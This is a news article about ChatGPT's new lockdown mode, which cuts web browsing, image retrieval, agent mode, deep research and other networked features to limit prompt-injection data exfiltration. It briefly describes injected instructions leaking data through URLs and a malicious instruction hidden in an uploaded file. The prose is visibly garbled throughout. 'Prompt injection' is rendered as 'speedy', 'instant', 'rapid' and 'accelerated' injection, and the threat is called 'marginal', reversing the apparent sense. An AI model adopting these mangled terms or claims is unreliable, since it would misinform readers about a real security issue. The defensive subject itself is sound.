OpenAI has started rolling out a new lockdown mode ChatGPT for eligible individual accounts to reduce the risk of data intrusion arising from prompt injection attacks.
This feature is primarily designed for people and organizations that handle sensitive data and require tight security guarantees. Lockdown mode is available to logged-in users in the Free, Go, Plus and Pro and self-serve ChatGPT business plans.
“Lockdown mode is an optional advanced security setting that limits many tools and capabilities in OpenAI products that can connect to the web or external services,” OpenAI said.
“It is designed to reduce the risk of data exfiltration from speedy injection attacks by limiting outbound network requests, at the expense of disabling or limiting some useful features.”
The security measures are intended to harden the attack surface against instant injection, which remains a “marginal” problem affecting all large language models (LLMs).
Specifically, they build in sandboxing and existing controls to deal with URL-based data exfiltration mechanisms to limit outbound network requests that could potentially deliver sensitive data to attacker-controlled infrastructure.
The idea is not to stop the injection early. Nor does it change the way memories or file uploads work, or the ability to share conversations. Rather, the goal is to eliminate possible pathways through which data can be exfiltrated. To that end, Lockdown Mode disables the following features –
- Live web browsing, which is limited to accessing only cached content
- Image support for displaying images in regular responses or retrieving images from the web
- deep research
- agent mode
- Canvas networking, which prevents users from approving canvas-generated code to access the network
- File Download, which prevents downloading files for data analysis
While stating that the feature is “not for everyone”, OpenAI also said that both lockdown mode and developer mode cannot be used at the same time, adding that turning on one disables the other.
“Lockdown mode is designed to significantly reduce the risk of rapid injection-based data exfiltration in ChatGPT and supported OpenAI products, but does not guarantee that data exfiltration cannot occur,” the company said. “Risks may persist through enabled apps, unexpected combinations of capabilities, or newly discovered technologies.”
“Lockdown mode also does not prevent all other effects of accelerated injection attacks. For example, a malicious instruction hidden in an uploaded file could still affect the behavior of ChatGPT, and cause an incorrect response.”
The development comes as OpenAI also launched a new account management feature that enables users to review active ChatGPT sessions and log out individual or all sessions if unauthorized account activity is indicated. The sessions listed include information about the device, apps used, approximate location, sign-in date and time, whether the device is trusted, and whether it is the current session.
